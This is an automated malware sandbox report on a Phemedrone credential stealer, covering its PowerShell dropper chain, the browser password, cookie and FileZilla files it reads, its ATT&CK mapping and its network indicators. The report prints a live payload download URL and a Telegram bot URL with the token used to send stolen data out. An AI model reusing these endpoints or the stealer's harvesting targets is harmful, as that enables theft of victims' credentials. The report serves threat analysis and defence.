            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeQueries volume information: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Masquerading            		2
            OS Credential Dumping            		331
            Security Software Discovery            		Remote Services2
            Data from Local System            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API            		Logon Script (Windows)Logon Script (Windows)251
            Virtualization/Sandbox Evasion            		Security Account Manager251
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell            		Login HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Obfuscated Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials123
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548278 Sample: DBp7mBJwqD.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 47 api.telegram.org 2->47 49 get.geojs.io 2->49 51 apitradingview.com 2->51 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 Multi AV Scanner detection for dropped file 2->67 71 5 other signatures 2->71 11 DBp7mBJwqD.exe 1 2->11         started        signatures3 69 Uses the Telegram API (likely for C&C communication) 47->69 process4 process5 13 cmd.exe 1 11->13         started        16 conhost.exe 11->16         started        signatures6 79 Suspicious powershell command line found 13->79 81 Bypasses PowerShell execution policy 13->81 18 cmd.exe 1 13->18         started        20 conhost.exe 13->20         started        process7 process8 22 cmd.exe 1 18->22         started        signatures9 73 Suspicious powershell command line found 22->73 25 powershell.exe 14 26 22->25         started        30 conhost.exe 22->30         started        process10 dnsIp11 53 apitradingview.com 86.104.15.60, 443, 49717, 49733 BELCLOUDBG Netherlands 25->53 41 C:\Users\user\...\WDSecureUtilities_548.exe, PE32 25->41 dropped 75 Loading BitLocker PowerShell Module 25->75 77 Powershell drops PE file 25->77 32 WDSecureUtilities_548.exe 14 3 25->32         started        37 WmiPrvSE.exe 25->37         started        file12 signatures13 process14 dnsIp15 43 api.telegram.org 149.154.167.220, 443, 49795 TELEGRAMRU United Kingdom 32->43 45 get.geojs.io 172.67.70.233, 443, 49754 CLOUDFLARENETUS United States 32->45 39 :newads (copy), PE32 32->39 dropped 55 Multi AV Scanner detection for dropped file 32->55 57 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 32->57 59 Machine Learning detection for dropped file 32->59 61 3 other signatures 32->61 file16 signatures17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DBp7mBJwqD.exe0%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe100%Joe Sandbox ML
            :newads (copy)79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
            C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://apitradingview.com100%Avira URL Cloudmalware
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://t.me/freakcodingspot0%Avira URL Cloudsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://t.me/0%Avira URL Cloudsafe
            https://www.graalvm.org/0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://t.me/TheDyer0%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument0%Avira URL Cloudsafe
            https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle0%Avira URL Cloudsafe
            https://apitradingview.com/WDSecureUtilities.exe100%Avira URL Cloudmalware
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://apitradingview.com100%Avira URL Cloudmalware
            https://api.tele0%Avira URL Cloudsafe
            https://apitradingview.com/ermando1.txt100%Avira URL Cloudmalware
            http://get.geojs.io0%Avira URL Cloudsafe
            https://get.geojs.io/v1/ip/geo.json0%Avira URL Cloudsafe
            https://get.geojs.io0%Avira URL Cloudsafe
            http://api.telegram.org0%Avira URL Cloudsafe
            https://www.graalvm.org/latest/reference-manual/native-image/metadata/#0%Avira URL Cloudsafe
            https://t.me/webster4800%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            get.geojs.io
            		172.67.70.233
            		truefalse
              		unknown
              api.telegram.org
              		149.154.167.220
              		truetrue
                		unknown
                apitradingview.com
                		86.104.15.60
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocumentfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://apitradingview.com/WDSecureUtilities.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://apitradingview.com/ermando1.txttrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://get.geojs.io/v1/ip/geo.jsonfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://t.me/WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://apitradingview.compowershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://t.me/freakcodingspotWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.graalvm.org/DBp7mBJwqD.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.orgWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/botWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://t.me/TheDyerWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundleDBp7mBJwqD.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://apitradingview.compowershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://get.geojs.ioWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EA37000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.teleWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://get.geojs.ioWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://api.telegram.orgWDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.graalvm.org/latest/reference-manual/native-image/metadata/#DBp7mBJwqD.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://t.me/webster480WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  		api.telegram.orgUnited Kingdom
                  		62041TELEGRAMRUtrue
                  86.104.15.60
                  		apitradingview.comNetherlands
                  		44901BELCLOUDBGfalse
                  172.67.70.233
                  		get.geojs.ioUnited States
                  		13335CLOUDFLARENETUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1548278
                  Start date and time:2024-11-04 09:37:48 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 42s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DBp7mBJwqD.exe
                  renamed because original name is a hash value
                  Original Sample Name:86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@15/9@4/3
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 8016 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: DBp7mBJwqD.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:38:49API Interceptor132x Sleep call for process: powershell.exe modified
                  03:39:04API Interceptor20x Sleep call for process: WDSecureUtilities_548.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                    pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                      Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      86.104.15.60Lokalkendskab.exeGet hashmaliciousGuLoaderBrowse
                                      • park-your-track.com/uXIrhGiBMIRv32.bin
                                      #U00d6deme makbuzu2.exeGet hashmaliciousGuLoaderBrowse
                                      • park-your-track.com/cQHyYR236.bin
                                      172.67.70.233https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                            https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                              https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                https://g.page/r/CbPyKO_ogGK3EAg/reviewGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                  P09Qwe9fqsKdQIyTGnGxNs8xS[1]Get hashmaliciousTycoon2FABrowse
                                                    vm AUDIO_QzOXYQIfIQZ VOICE September 11th, 2024 attachment.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646fGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                        M 1votFC.emlGet hashmaliciousUnknownBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          get.geojs.ionuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          file.exeGet hashmaliciousUnknownBrowse
